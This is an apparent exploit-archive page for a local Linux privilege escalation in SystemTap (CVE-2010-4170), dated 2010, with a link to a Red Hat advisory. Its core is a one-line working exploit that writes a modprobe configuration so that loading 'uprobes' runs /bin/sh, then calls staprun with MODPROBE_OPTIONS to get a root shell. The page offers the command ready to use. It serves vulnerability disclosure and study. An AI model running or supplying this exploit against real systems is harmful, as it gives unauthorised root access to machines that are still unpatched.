Skip to content
cyberexploits
locallinuxbash

SystemTap - Privilege Escalation

SystemTap - Privilege Escalation

Published on 2010-11-26

Source code

Pinned to commit 7eac4c3a2ce5
bashplatforms/linux/local/15620.sh7eac4c3a
raw
CVE-2010-4170

printf "install uprobes /bin/sh" > exploit.conf; MODPROBE_OPTIONS="-C exploit.conf" staprun -u whatever


RHEL Advisory:
https://rhn.redhat.com/errata/RHSA-2010-0894.html
View on GitHub